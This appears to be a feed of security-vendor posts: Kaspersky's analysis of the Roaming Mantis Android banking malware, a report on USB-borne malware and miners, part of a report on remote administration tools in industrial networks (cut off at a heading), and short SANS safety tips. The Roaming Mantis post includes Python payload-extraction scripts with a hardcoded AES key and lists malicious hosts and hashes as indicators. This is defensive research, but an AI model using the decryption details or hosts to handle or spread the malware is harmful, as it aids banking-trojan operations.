    In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

    You can check previous chapters of this research here:

    In addition we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, which was disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to their router using default ID and password, and changed legitimate DNS settings to rogue DNS settings, where the router’s control panel was accessible over the Internet.

    The Roaming Mantis group did not stop its activities after publication or our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods such as web crypto mining for iOS devices, spreading via malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

    Web crypto-mining for iOS devices

    The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

    Part of HTML source code of the malicious landing page for iOS

    The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

    If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

    Screen capture of the landing page and CPU monitoring tool

    Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

    Filtering Japanese devices

    One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. The new feature was added in the landing page to filter out Japanese environment:

    Added confirmation of Japanese environment for filtering

    It looks like they want to slow down infections of Japanese targets for the time being.

    Spreading via another malware delivery system

    In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “Trojan-Banker.AndroidOS.Wroba.al”, were still being detected by our customers, according to our KSN data.

    Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

    Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware, the “sagawa.apk” delivery system. We published a Japanese blogpost of this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector involved users received a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL. If the user clicked it, the server displayed a fake web site that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

    Type A Type B File name sagawa.apk sagawa.apk md5 956f32a28d0057805c7234d6a13aa99b a19f4cb93274c949e66efe13173c95e6 File size 427KB (437,556) 2.3MB (2,381,665) Loader module \classes.dex \classes.dex +
    \lib\arm64-v8a\libkao.so
    \lib\armeabi-v7a\libkao.so
    \lib\x86\libkao.so
    \lib\x86_64\libkao.so Encrypted payload (enc_data) \assets\a \assets\code.so Decrypt algorithm payload = base64_dec(zlib_dec(enc_data)); aes_key = base64_dec(hardcoded data);
    payload = AES_dec(enc_data, aes_key); Alias MaqHao (McAfee)
    XLoader (TrendMicro) FAKESPY (TrendMicro) Old file name facebook.apk
    chrome.apk
    ${random}.apk sagawa.apk

    Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

    Japanese messages displayed to infected users

    In addition, this malware confirms whether a domestic Japanese prepaid card application is installed on the infected device.

    Check for the domestic Japanese prepaid card application “Au Wallet”

    If the application is installed on the device, the malware downloads and installs a fake application as its update.

    Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

    Researchers may use the following simplified python scripts to extract the payload from “sagawa.apk”:

    • sagawa.apk_typeA_payload_extractor.py
    #!/usr/bin/env python import sys import zlib import base64 data = open(sys.argv[1],"rb").read() dec_z = zlib.decompress(data) dec_b = base64.b64decode(dec_z) with open(sys.argv[1]+".dec","wb") as fp: fp.write(dec_b)

    • sagawa.apk_typeB_payload_extractor.py
    #!/usr/bin/env python import sys from Crypto.Cipher import AES, ARC4 import base64 data = open(sys.argv[1],"rb").read() key = sys.argv[2] aes_key = base64.b64decode(key) // key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so aes = AES.new(aes_key) dec = aes.decrypt(data) with open(sys.argv[1]+".dec","wb") as fp: fp.write(dec)

    Spreading via prezi.com like a scam

    We also observed another malware distribution method of Roaming Mantis which is linked to prezi.com. Prezi is a popular computer application and online service to create dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult video, a game, a comic, music and so on, like pirate editions.

    Redirection to a scam page

    Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

    Corrupted landing page code from Roaming Mantis posted on prezi.com

    However, fortunately this code does not work because of mistakes made during the code preparation stage.

    Records of stolen data

    Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

    Suspected stolen data from victims’ Android devices

    This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Victims’ language settings (download)

    The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and the new distribution strategies. The reason why the “en-us” is the most popular could be because English is used as second language in several countries.

    Conclusions

    In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. It seems that the attack doesn’t stop developing. In our recent research, we found that they probed using a web miner for iOS, instead of redirecting to a fake Apple website.

    Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

    Roaming Mantis is also trying to spread its malware via prezi.com, with a scam that offers a visitor free content such as videos and more.

    Judging from the list of stolen credentials, the attackers seems to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just a tip of the iceberg.

    We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

    Kaspersky Lab products detect this malware with the following verdict:

    • HEUR:Trojan-Banker.AndroidOS.Wroba
    IoCs Malicious hosts:
    • 59.105.6[.]230
    • sagawa-otqwt[.]com
    • sagawa-polsw[.]com
    Hashes of Type A:
    • 956f32a28d0057805c7234d6a13aa99b sagawa.apk
    • 3562f9de6dbe70c2e19a20d8683330ce \classes.dex
    • 01fa0039b62c5db8d91dfc6b75b246f8 decrypted payload (dex file) from \assets\a
    Hashes of Type B:
    • a19f4cb93274c949e66efe13173c95e6
    • 5e913208ecc69427efb6bbf9e6505624 \classes.dex
    • 67bc2e8beb14b259a5c60fe7a31e6795 \arm64-v8a/libkao.so
    • f120f5f78c7ef762996314cf10f343af \armeabi-v7a/libkao.so
    • efe54c22e2b28a44f723d3479487620c \x86_64/libkao.so
    • e723c6aec4433f3c6e5d3d24fe810e05 \x86/libkao.so
    • daeccda295de93cf767fd39a86a44355 decrypted payload (jar file) from \assets\code.so
    • 581b08b277a8504ed222a71c19cea5f9 classes.dex from decrypted payload

    Ransomware

    SANS Tip of the Day - Thu, 09/27/2018 - 01:00
    Ransomware is a special type of malware. Once it infected your computer, it encrypts all of your files and demands you pay a ransome if you want your files back. Be suspicious of any emails trying to trick you into opening infected attachments or click on malicious links, common sense is your best defense. In addition. backups are often the only way you can recover from ransomware.

    USB threats from malware to miners

    Malware Alerts - Tue, 09/25/2018 - 06:00

    Introduction

    In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

    USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

    Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

    USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

    This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

    Methodology and key findings

    The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

    Key findings
    • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
    • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
    • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
    • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
    • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
    • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
    • Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
    The evolving cyberthreat landscape for USBs

    Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

    This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.

    These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    *Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    *Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

    USBs as a tool for advanced threat actors

    USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

    USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

    Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.

    The Stuxnet survivor CVE-2010-2568

    Microsoft fixed the last of the vulnerable LNK code path in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability, (although it was overtaken in 2017 by the EternalBlue exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

    If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

    Malware delivered via removable media

    The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

    In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

    For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

    Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

    Miners – rare but persistent

    USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

    Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

    Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

    Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

    Year Detection data for Trojan.Win32.Miner.ays Unique user count 2017 778,620 236,000 2018 (estimate based on H1) 600,698 196,866

    Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

    The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also been seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

    These results suggest that propagation via removable media works well for this threat.

    Detection data for Trojan.Win64.Miner.all is as follows:

    Year Detection data for
    Trojan.Win64.Miner.all Unique user count YoY change Unique user count as share of all users hit with a removable media threat 2016 4,211,246 245,702 +70.15% 4.2% 2017 4,214,785 301,178 +18.42% 6.7% 2018 (estimate based on H1) 4,209,958 362,242 +16.42% 9.2% Dark Tequila – advanced banking malware

    In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

    According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

    Target geography

    Emerging markets appear to be the most vulnerable to infection by removable media.

    The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

    For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

    The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

    Conclusion and advice

    The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

    USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

    Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

    Advice for all USB users:

    • Be careful about the devices you connect to your computer – do you know where it came from?
    • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
    • Make sure all data stored on the USB is also encrypted
    • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

    Additional advice for businesses:

    • Manage the use of USB devices: define which USB devices can be used, by whom and for what
    • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
    • Don’t leave USBs lying around or on display

    Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.

    Secure Your Home Wi-Fi Network

    SANS Tip of the Day - Tue, 09/25/2018 - 01:00
    Be aware of all the devices connected to your home network, including baby monitors, gaming consoles, TVs, appliances or even your car. Ensure all those devices are protected by a strong password and/or are running the latest version of their operating system.

    Kids and Family Members

    SANS Tip of the Day - Fri, 09/21/2018 - 01:00
    If you have children visiting or staying with family members (such as grandparents), make sure the family members know your rules concerning technology that your kids must follow. Just because your kids leave the house does not mean the rules about what they can do online change.

    Threats posed by using RATs in ICS

    Malware Alerts - Thu, 09/20/2018 - 06:00

    While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.

    Methodology

    The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

    • supervisory control and data acquisition (SCADA) servers;
    • data storage servers (Historian);
    • data gateways (OPC);
    • stationary workstations of engineers and operators;
    • mobile workstations of engineers and operators;
    • Human Machine Interface (HMI).

    As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

    The use of RATs in ICS

    According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Percentage of ICS computers that have RATs legitimately installed on them (download)

    The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

    As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

    From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

    1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
    2. To control/maintain HMI from an engineering workstation;
    3. To control SCADA from an operator workstation;
    4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
    5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
    6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

    Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country) (download)

    Scenarios of RAT installation on ICS computers

    According to our research, there are three most common scenarios of RAT installation on ICS computers:

    1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Percentage of RATs bundled with ICS products to all RATs found on ICS computers (download)

    1. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
    2. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).
    RAT-related threats to ICS

    Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

    Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

    • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
    • No support for restricting local access to the system / client activity;
    • Single-factor authentication;
    • No logging of client activity;
    • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
    • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

    The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

    There are also other issues that affect RATs built into ICS software distribution packages:

    • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
    • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

    RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

    Attacks of threat actors involving RATs

    Everything written above applies to potential threats associated with the use of RATs.

    Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

    1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
    2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
    3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
    4. A network attack from the local network or the internet on the server part of the RAT using exploits.

    Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

    It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

    Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

    Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

    Attacks on industrial enterprises using RMS and TeamViewer

